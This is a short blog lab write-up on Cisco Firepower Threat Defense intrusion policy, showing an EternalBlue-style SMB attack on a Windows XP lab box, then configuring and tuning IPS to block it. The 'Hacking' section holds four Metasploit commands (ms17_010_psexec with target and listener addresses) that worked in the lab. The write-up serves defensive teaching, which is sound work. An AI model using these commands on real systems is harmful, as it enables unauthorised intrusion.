Post

Cisco FTD Intrusion Policy

Posted
By Sena Perdiana 1 min read

Cisco FTD (Firepower Threat Defense) intrusion policy is a set of rules and configurations used to detect and prevent network intrusions by inspecting traffic for known threats and anomalies. It leverages Snort-based signatures and provides customizable protection levels, allowing administrators to balance security and performance based on their environment.


Hacking

In this lab we will do some lightweight hacking to prove that FTD’s IPS can block this attack, here we have the victim box which is a Windows XP on the inside network

x


On the FTD side, right now we only have an ‘Allow All’ policy with no IPS/IDS enabled

x


On the outside network, we have a Kali Linux that we use to penetrate the Windows XP. Here we run a Metasploit to exploit vulnerability on SMB

1
2
3
4

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.71.0.23
set LHOST 172.17.1.24
exploit

x


And we have successfully hacked the box

x


Configuring IPS

To prevent this attack, we will configure an Intrusion Prevention Policy on FTD

x


The IPS Policy works by comparing network traffic against a database of known threat patterns, called signatures. In this specific Base Policy we can see that exploits against Windows Box are already predefined and will be used once the attack happens

x


On Summary, we can see this type of profile contains almost 10,000 signatures used to detect any attack or exploit

x


Now we can use the Intrusion Policy inside a Policy Rule

x


After IPS is set up, if we try to run the exploit again, we will get a Timeout Error

x


On Connection Events, we see the attack was detected and blocked

x


We can also see the deatils of the attack on the Intrusion Events

x

x


Tuning the Intrusion Policy

Before we used Balance IPS Base Policy, now lets try using the Maximum Detection

x


The difference is, instead of having almost 10,000 active rules, now it has over 40,000

x


This will obviously lead to more traffic getting blocked, the example being PING is now no longer allowed

x

x


We can tune this further by adjusting the detection as we need, here we’ll override the ICMP block so PING is no longer blocked

x

x


And now PING is allowed again

x


Security, Cisco Firepower Threat Defense (FTD)
FTD
This post is licensed under CC BY 4.0 by the author.